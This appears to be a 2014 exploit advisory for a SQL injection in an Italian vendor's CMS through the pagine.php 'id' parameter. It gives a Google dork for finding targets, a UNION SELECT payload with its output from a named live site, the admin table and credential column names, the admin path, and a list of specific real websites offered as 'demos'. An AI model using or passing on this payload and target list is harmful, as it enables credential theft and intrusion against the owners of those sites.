[+] Exploit Title: (ABZ Srl) Cms SQL Injection
[+] Exploit Author: Medrik
[+] Found Date: 13-03-2014
[+] Vendor Homepage: http://www.abzsrl.com/
[+] Google Dork: intext:"powered by ABZ Srl" inurl:pagine.php?id=
[+] Tested on: Windows
==========================================
[+] Exploit (Vulnerability Locate):
http://[vulnerable_host]/pagine.php?id=IdNumber[SQLi]
You Can Inject This SQLi Vuln With Some Tools Like SqlMap Or Other Tools .
[*] Important Table : AMMINISTRAZIONE
[*] Important Columns : For User : [ USERN ] & For Password : [ PSWD ]
[*] Example Poc For Database Version : +/*!union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Test : http://www.reginanewhouse.com/pagine.php?id=2+/*!union*/+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[*] Response For Test : 5.5.36-34.2-log
[*] Admin Page : /admin [*]
[*] Image : http://i.imgur.com/wNAWyBI.png
==========================================
[+] Demo (s) :
(#) http://www.reginanewhouse.com/pagine.php?id=2[SQli]
(#) http://www.gruppo-ria.com/pagine.php?id=2[SQli]
(#) http://www.euroxoro-torino.it/pagine.php?id=7[SQli]
(#) http://www.dimsegnaletica.com/pagine.php?id=4[SQli]
==========================================
[+] Gr33tz :
R33VES , Enddo , Beni_Vanda , Explo!ter , Black.KinG , M.R.S.CO , MR.0x41 , Dr.3v1l
==========================================
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information